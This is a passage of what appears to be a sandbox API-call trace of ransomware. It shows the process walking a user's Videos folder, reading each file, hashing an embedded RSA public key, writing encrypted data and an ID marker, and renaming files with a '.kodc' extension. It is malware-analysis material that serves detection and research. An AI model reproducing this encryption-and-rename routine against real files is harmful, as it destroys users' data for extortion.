HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.654] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.655] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.655] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.655] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.655] CloseHandle (hObject=0x5cc) returned 1 [0100.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.656] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0100.656] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.656] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XHearxWNtiYbMgqS bX.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xhearxwntiybmgqs bx.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XHearxWNtiYbMgqS bX.flv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xhearxwntiybmgqs bx.flv.kodc")) returned 1 [0100.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.657] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.657] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.659] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b6cfae0, ftCreationTime.dwHighDateTime=0x1d5c3c2, ftLastAccessTime.dwLowDateTime=0x57cb17a0, ftLastAccessTime.dwHighDateTime=0x1d5c308, ftLastWriteTime.dwLowDateTime=0x57cb17a0, ftLastWriteTime.dwHighDateTime=0x1d5c308, nFileSizeHigh=0x0, nFileSizeLow=0xf897, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yty9V7vt-N2 T.avi", cAlternateFileName="YTY9V7~1.AVI")) returned 1 [0100.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0100.659] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.659] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yty9V7vt-N2 T.avi") returned=".avi" [0100.660] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yty9V7vt-N2 T.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yty9v7vt-n2 t.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.660] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=63639) returned 1 [0100.660] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.663] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf871, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.663] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.664] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.664] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xf897, lpOverlapped=0x0) returned 1 [0100.665] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.665] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.665] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.665] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.666] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.666] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.666] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.666] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.666] GetLastError () returned 0x0 [0100.667] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.667] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.667] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.667] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.667] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xf8a0) returned 0x9bb8968 [0100.667] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb58a8 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d88 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb58f0 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7da0 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7dd0 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7de8 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.668] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7dd0 | out: hHeap=0x630000) returned 1 [0100.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7de8 | out: hHeap=0x630000) returned 1 [0100.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7de8 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7dd0 [0100.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7de8 | out: hHeap=0x630000) returned 1 [0100.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7dd0 | out: hHeap=0x630000) returned 1 [0100.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.669] GetCurrentThreadId () returned 0x42c [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba72b8 [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.670] GetCurrentThreadId () returned 0x42c [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7dd0 [0100.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7de8 [0100.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7db8 [0100.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.672] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf897, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.672] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.672] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.672] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.672] CloseHandle (hObject=0x5cc) returned 1 [0100.674] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yty9V7vt-N2 T.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yty9v7vt-n2 t.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\yty9V7vt-N2 T.avi.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yty9v7vt-n2 t.avi.kodc")) returned 1 [0100.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.675] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.676] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17276450, ftCreationTime.dwHighDateTime=0x1d5c2be, ftLastAccessTime.dwLowDateTime=0xd6e17740, ftLastAccessTime.dwHighDateTime=0x1d5c309, ftLastWriteTime.dwLowDateTime=0xd6e17740, ftLastWriteTime.dwHighDateTime=0x1d5c309, nFileSizeHigh=0x0, nFileSizeLow=0x8654, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_qZtKPa8t1aDT4M.mp4", cAlternateFileName="_QZTKP~1.MP4")) returned 1 [0100.676] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_qZtKPa8t1aDT4M.mp4") returned=".mp4" [0100.676] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_qZtKPa8t1aDT4M.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_qztkpa8t1adt4m.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.676] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=34388) returned 1 [0100.676] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.679] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x862e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.679] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.680] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.680] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x8654, lpOverlapped=0x0) returned 1 [0100.680] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.680] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.680] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.680] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.681] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.681] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.681] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.682] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, 